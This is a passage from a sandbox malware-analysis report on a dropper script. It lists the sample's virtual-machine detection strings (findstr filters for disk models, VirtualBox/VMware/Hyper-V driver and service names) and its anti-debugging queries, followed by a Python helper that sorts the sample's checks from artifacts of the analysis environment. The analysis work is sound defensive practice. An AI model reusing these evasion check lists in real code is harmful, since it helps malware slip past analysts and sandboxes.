Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1360Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6228Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5852Thread sleep count: 5007 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 984Thread sleep count: 2046 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5824Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 4428Thread sleep count: 287 > 30
Source: C:\Windows\System32\dllhost.exe TID: 2484Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 6640Thread sleep count: 456 > 30
Source: C:\Windows\System32\winlogon.exe TID: 6640Thread sleep time: -45600s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 2344Thread sleep count: 273 > 30
Source: C:\Windows\System32\svchost.exe TID: 4948Thread sleep count: 403 > 30
Source: C:\Windows\System32\svchost.exe TID: 4948Thread sleep time: -40300s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 1236Thread sleep count: 201 > 30
Source: C:\Windows\System32\svchost.exe TID: 3616Thread sleep count: 379 > 30
Source: C:\Windows\System32\svchost.exe TID: 3616Thread sleep time: -37900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5448Thread sleep count: 373 > 30
Source: C:\Windows\System32\svchost.exe TID: 5448Thread sleep time: -37300s >= -30000s
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 3228Thread sleep count: 1708 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 3228Thread sleep count: 446 > 30
Source: C:\Windows\System32\svchost.exe TID: 6108Thread sleep count: 368 > 30
Source: C:\Windows\System32\svchost.exe TID: 6108Thread sleep time: -36800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5576Thread sleep count: 363 > 30
Source: C:\Windows\System32\svchost.exe TID: 5576Thread sleep time: -36300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1880Thread sleep count: 300 > 30
Source: C:\Windows\System32\svchost.exe TID: 1880Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2124Thread sleep count: 342 > 30
Source: C:\Windows\System32\svchost.exe TID: 2124Thread sleep time: -34200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6024Thread sleep count: 298 > 30
Source: C:\Windows\System32\svchost.exe TID: 3744Thread sleep count: 322 > 30
Source: C:\Windows\System32\svchost.exe TID: 3744Thread sleep time: -32200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3264Thread sleep count: 323 > 30
Source: C:\Windows\System32\svchost.exe TID: 3264Thread sleep time: -32300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6240Thread sleep count: 306 > 30
Source: C:\Windows\System32\svchost.exe TID: 6240Thread sleep time: -30600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6336Thread sleep count: 309 > 30
Source: C:\Windows\System32\svchost.exe TID: 6336Thread sleep time: -30900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6380Thread sleep count: 306 > 30
Source: C:\Windows\System32\svchost.exe TID: 6380Thread sleep time: -30600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6448Thread sleep count: 300 > 30
Source: C:\Windows\System32\svchost.exe TID: 6448Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6516Thread sleep count: 299 > 30
Source: C:\Windows\System32\svchost.exe TID: 6688Thread sleep count: 294 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\wbem\WMIADAP.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241390D894 FindFirstFileExW,
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241390DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241393D894 FindFirstFileExW,
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241393DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E3D894 FindFirstFileExW,
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EAD894 FindFirstFileExW,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1ACD894 FindFirstFileExW,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1ACDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CED894 FindFirstFileExW,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC64D894 FindFirstFileExW,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC67D894 FindFirstFileExW,
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AED894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A66130D894 FindFirstFileExW,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDCD894 FindFirstFileExW,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE4D894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879CD894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F4D894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537AD894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537DD894 FindFirstFileExW,
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE653DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE653D894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D56DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D56D894 FindFirstFileExW,
Source: Amcache.hve.10.drBinary or memory string: VMware
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxservice
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxsf.sys
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.drBinary or memory string: VMware SATA CD00
Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: svchost.exe, 00000030.00000002.3005591334.000001845AC2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.drBinary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.drBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
Source: cmd.exe, 00000013.00000003.2083609583.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2085257031.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2085855678.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2084489555.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2084133578.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2086602704.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2082690674.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2085736368.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2082095231.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2081856239.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2086221722.0000022413295000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 0T2B0A" /c:"QEMU HARDDISK" K
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.50.dr | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.50.dr | Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000029.00000000.2461945844.000002A66062A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.50.dr | Binary or memory string: VMCI: Using capabilities (0x1c).
Source: Amcache.hve.10.dr | Binary or memory string: vmci.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC21D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: qemu-ga
Source: cmd.exe, 00000013.00000003.2069301255.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2069201279.0000022413295000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmicshutdown
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC21D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: qemuwmi2y
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC3EE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmware
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr | Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000032.00000000.2526982413.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3012792794.000001D55862B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.50.dr | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $Hyper-V Time Synchronization Service
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmusrvc2y
Source: Amcache.hve.10.dr | Binary or memory string: VMware20,1
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmicvss
Source: Amcache.hve.10.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: svchost.exe, 00000032.00000000.2531567610.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: dowvmci
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr | Binary or memory string: VMware
Source: Amcache.hve.10.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.dr | Binary or memory string: VMware Virtual RAM
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.50.dr | Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: Amcache.hve.10.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vboxguest.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmmouse.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmicheartbeat
Source: Amcache.hve.10.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr | Binary or memory string: VMware Virtual USB Mouse
Source: lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicvssNT SERVICE
Source: Amcache.hve.10.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.10.dr | Binary or memory string: VMware, Inc.
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC21D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: QEMU HARDDISK
Source: Amcache.hve.10.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vboxmouse.sys
Source: Amcache.hve.10.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: C:\Program Files\VMware
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.50.dr | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VBoxMouse.sys
Source: dwm.exe, 0000002A.00000002.3088029221.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: Microsoft-Windows-WER-PayloadHealth%4Operational.evtx.50.dr | Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr | Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: Amcache.hve.10.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: lsass.exe, 00000028.00000002.3004375216.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454613011.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2984423771.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2461883353.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.2487807964.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.2985218282.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002E.00000002.2984681967.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002E.00000000.2491864089.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2505327301.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3006995686.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2526982413.000001D55862B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicshutdownNT SERVICE
Source: Amcache.hve.10.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.10.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.10.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: cmd.exe, 00000013.00000003.2081856239.0000022413295000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: Amcache.hve.10.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTVMWare
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr | Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000032.00000000.2527082224.000001D558643000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@vmcitpA
Source: svchost.exe, 00000029.00000000.2462217296.000002A660662000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000039.00000002.2984538693.0000023FD3802000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: Amcache.hve.10.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: c:\program files\vmware
Source: lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VBoxSF.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: !Hyper-V PowerShell Direct Service
Source: dwm.exe, 0000002A.00000002.3088029221.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\dllhost.exe | API call chain: ExitProcess graph end node (2 occurrences)
Source: C:\Windows\System32\wbem\WMIC.exe | Process information queried: ProcessInformation
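Not every row above is the sample looking for a hypervisor. The rows sourced from Amcache.hve and the dropped .evtx logs, and the SCSI device identifiers in svchost.exe, dwm.exe and lsass.exe memory, are the analysis VM's own VMware hardware showing up in the host's logs and processes. The sample's actual checks are the two findstr filters that cmd.exe applies to the WMI disk-model output (DADY HARDDISK / WDS100T2B0A / QEMU HARDDISK and BOCHS_ / BXPC___ / QEMU / VirtualBox) and the driver and service name lists in powershell.exe memory (vboxguest.sys, VBoxSF.sys, vmmouse.sys, qemu-ga, the vmic* Hyper-V integration services, vmusrvc). The triage helper below is an added example and not part of the Joe Sandbox report: it parses rows of this shape, tags each memory string with the hypervisor family it names, and keeps strings from the sample's own processes apart from environment leakage. Which processes count as the sample's (cmd.exe and powershell.exe, the processes the .cmd dropper runs through) and the keyword-to-family table are this example's assumptions; the input rows are copied from the report.

```python
import re
from collections import defaultdict

# Keyword -> hypervisor family table (this example's own, not from the report).
# vmic* are Hyper-V integration services, vmusrvc is the Virtual PC guest service,
# VMCI is VMware's guest/host communication interface.
FAMILIES = {
    "vmware":     ("vmware", "vmci", "necvmwar", "vmmouse"),
    "virtualbox": ("vbox", "virtualbox"),
    "qemu":       ("qemu", "bochs", "bxpc"),
    "hyper-v":    ("hyper-v", "vmic", "hvhost"),
    "virtualpc":  ("vmusrvc", "vmsrvc"),
}

# Assumption for this report: the .cmd dropper runs through cmd.exe and powershell.exe.
# Strings in their memory are the sample's own check lists; strings in dropped files
# (*.dr: Amcache, event logs) or in system processes are the analysis VM describing itself.
SAMPLE_PROCESSES = {"cmd.exe", "powershell.exe"}

# Accepts the report's column-joined rows ("...sdmpBinary or memory string: ...")
# as well as rows with a " | " separator between the two columns.
ROW_RE = re.compile(r"^Source:\s*(?P<src>.*?)\s*\|?\s*Binary or memory string:\s*(?P<val>.*)$")
FINDSTR_RE = re.compile(r'/c:"([^"]+)"')


def parse_row(line):
    """Split one evidence row into (source, memory string); None for any other row."""
    m = ROW_RE.match(line.strip())
    return (m.group("src"), m.group("val")) if m else None


def source_process(src):
    """First entry of the Source column: a process name or a dropped-file name."""
    return src.split(",")[0].strip()


def classify(value):
    """Hypervisor families a memory string points at (several for a findstr line)."""
    v = value.lower()
    return {fam for fam, needles in FAMILIES.items() if any(n in v for n in needles)}


def triage(lines):
    """Bucket rows into the sample's own checks vs. environment leakage, per family."""
    summary = {
        "sample_checks": defaultdict(set),   # family -> sample processes holding the string
        "environment": defaultdict(set),     # family -> artifacts that merely describe the VM
        "findstr_targets": set(),            # literal disk models / vendors the sample greps for
    }
    for line in lines:
        row = parse_row(line)
        if row is None:
            continue
        src, val = row
        proc = source_process(src)
        bucket = "sample_checks" if proc in SAMPLE_PROCESSES else "environment"
        for fam in classify(val):
            summary[bucket][fam].add(proc)
        if bucket == "sample_checks" and "findstr" in val:
            summary["findstr_targets"].update(FINDSTR_RE.findall(val))
    return summary


# Constructed input: rows copied from the report above, one per kind of source.
ROWS = [
    'Source: cmd.exe, 00000013.00000003.2069301255.0000022413295000.00000004.00000020.00020000.00000000.sdmp | '
    'Binary or memory string: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"',
    'Source: cmd.exe, 00000013.00000003.2081856239.0000022413295000.00000004.00000020.00020000.00000000.sdmp | '
    'Binary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"',
    "Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp | "
    "Binary or memory string: vboxguest.sys",
    "Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp | "
    "Binary or memory string: vmmouse.sys",
    "Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp | "
    "Binary or memory string: vmicshutdown",
    "Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp | "
    "Binary or memory string: vmusrvc2y",
    "Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device",   # raw joined form
    "Source: System.evtx.50.dr | Binary or memory string: VMCI: Using capabilities (0x1c).",
    "Source: svchost.exe, 00000032.00000000.2526982413.000001D55862B000.00000004.00000001.00020000.00000000.sdmp | "
    "Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor",
]

if __name__ == "__main__":
    result = triage(ROWS)
    for bucket in ("sample_checks", "environment"):
        for fam, procs in sorted(result[bucket].items()):
            print(f"{bucket:14s} {fam:11s} {', '.join(sorted(procs))}")
    print("findstr targets:", ", ".join(sorted(result["findstr_targets"])))
```

Run over the full report, the "sample_checks" bucket is what goes into the behaviour write-up; the "environment" bucket is a reminder of which strings would also appear in a report for a harmless file on the same sandbox.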

Anti Debugging

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread information set: HideFromDebugger (22 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugFlags (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugObjectHandle (2 occurrences)
Source: C:\Windows\System32\cmd.exe | Code function: 19_2_000002241390CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\cmd.exe | Code function: 19_2_0000022413901E3C LoadLibraryA,GetProcAddress,SleepEx,
Source: C:\Windows\System32\cmd.exe | Code function: 19_2_0000022413901D30 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,
